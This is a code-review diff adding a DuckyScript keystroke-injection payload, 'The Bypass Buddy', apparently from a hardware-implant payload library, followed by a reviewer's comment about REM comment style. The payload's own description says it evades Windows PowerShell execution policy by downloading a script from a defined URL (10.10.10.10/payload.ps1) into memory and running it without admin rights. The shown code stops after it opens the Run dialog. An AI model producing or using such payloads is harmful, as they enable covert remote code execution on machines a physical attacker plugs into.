payloads/library/execution/bypass-buddy/bypass-buddy.txt

```diff
@@ -0,0 +1,31 @@
+REM_BLOCK
+    The Bypass Buddy
+    by salt-or-ester - salt-or-ester@protonmail.com
+    Tested on: O.MG Plug Elite, Windows 11
+    Will likely work on other devices and Windows flavors
+    
+    The Bypass Buddy implements a method to evade Windows script execution 
+    policy protections.
+    
+    The approach involves downloading a Powershell script into memory (not disk), 
+    and running it on-the-fly. 
+    
+    This can be accomplished without administrative rights.
+END_REM
+
+REM Payload to download and run in memory
+DEFINE #PAYLOAD_URL "http://10.10.10.10/payload.ps1"
+
+FUNCTION EVADE_SCRIPT_EXECUTION_POLICY()
+GUI r
+DELAY 2000 REM Let GUI load
```

Comment:
While this technically works, it will throw a warning as it is not best practice. 
If you need to put REM comments, they should ideally be on their own line - so they are fully omitted from the compiled payloads rather than converted to NOOPs.